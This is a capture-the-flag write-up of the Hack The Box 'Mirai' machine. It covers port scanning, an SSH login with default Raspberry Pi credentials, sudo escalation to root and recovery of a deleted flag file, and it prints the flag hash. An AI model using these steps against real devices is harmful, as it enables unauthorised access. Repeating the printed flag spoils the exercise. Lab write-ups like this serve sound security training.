hack the box walkthrough – Mirai machine
New easy linux HTB machine today, Mirai!
Difficulty mentioned is easy.. let’s find out.
We don’t change now an old habit : let’s start with our nmapautomator scan:
[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.82.188 Full Running a Full scan on 10.129.82.188 Host is likely running Linux ---------------------Starting Nmap Full Scan---------------------- Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:41 EST Initiating Parallel DNS resolution of 1 host. at 16:41 Completed Parallel DNS resolution of 1 host. at 16:41, 0.01s elapsed Initiating Connect Scan at 16:41 Scanning 10.129.82.188 [65535 ports] Discovered open port 22/tcp on 10.129.82.188 Discovered open port 53/tcp on 10.129.82.188 Discovered open port 80/tcp on 10.129.82.188 Warning: 10.129.82.188 giving up on port because retransmission cap hit (1). Discovered open port 32400/tcp on 10.129.82.188 Connect Scan Timing: About 23.03% done; ETC: 16:43 (0:01:44 remaining) Connect Scan Timing: About 44.31% done; ETC: 16:43 (0:01:17 remaining) Discovered open port 1450/tcp on 10.129.82.188 Connect Scan Timing: About 67.48% done; ETC: 16:43 (0:00:44 remaining) Discovered open port 32469/tcp on 10.129.82.188 Completed Connect Scan at 16:43, 136.87s elapsed (65535 total ports) Nmap scan report for 10.129.82.188 Host is up (0.025s latency). Not shown: 65089 closed ports, 440 filtered ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 1450/tcp open dwf 32400/tcp open plex 32469/tcp open unknown Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 136.95 seconds Making a script scan on extra ports: 1450, 32400, 32469 Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:43 EST Nmap scan report for 10.129.82.188 Host is up (0.029s latency). PORT STATE SERVICE VERSION 1450/tcp open upnp Platinum UPnP 188.8.131.52 (UPnP/1.0 DLNADOC/1.50) 32400/tcp open http Plex Media Server httpd | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Server returned status 401 but no WWW-Authenticate header. |_http-cors: HEAD GET POST PUT DELETE OPTIONS |_http-title: Unauthorized 32469/tcp open upnp Platinum UPnP 184.108.40.206 (UPnP/1.0 DLNADOC/1.50) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds ---------------------Finished all Nmap scans--------------------- Completed in 2 minute(s) and 30 second(s)
We have quite a few ports open on this machine..
Let’s start with the port 80. When I opened it with the web browser I got a blank page. I ran disbuster to check if any file or folder can be found.
The folder admin brings me to a Pi-hole dashboard.
Thanks to google, I have found the default credential of the SSH connection pi/raspberry
[email protected]:~$ ssh [email protected] ssh: Could not resolve hostname h10.129.82.188: Name or service not known [email protected]:~$ ssh [email protected] [email protected]'s password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Aug 27 14:47:50 2017 from localhost SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. [email protected]:~ $ whoami pi
A linpeas scan showed me that the user pi is member of the sudo group and I can use /tmp/shrndom with the sudo tokens exploit for privilege escalation
[email protected]:~ $ sudo /tmp/shrndom # id uid=0(root) gid=0(root) groups=0(root) # whoami root # cd /root # cat root.txt I lost my original root.txt! I think I may have a backup on my USB stick...
Where is my flag?
Oh ok… I thought I was done here..
A new linpeas scan showed me the disk mounted on /media/usbdisk
# cd /media/usbstick # ls -al total 18 drwxr-xr-x 3 root root 1024 Aug 14 2017 . drwxr-xr-x 3 root root 4096 Aug 14 2017 .. -rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt drwx------ 2 root root 12288 Aug 14 2017 lost+found # cat damnit.txt Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James
Oh god.. have you done James ?
So I ran the following command to recover the root.txt file :
# strings /dev/sdb >r & /media/usbstick lost+found root.txt damnit.txt >r & >r & /media/usbstick lost+found root.txt damnit.txt >r & /media/usbstick 2]8^ lost+found root.txt damnit.txt >r & 3d3e483143ff12ec505d026fa13e020b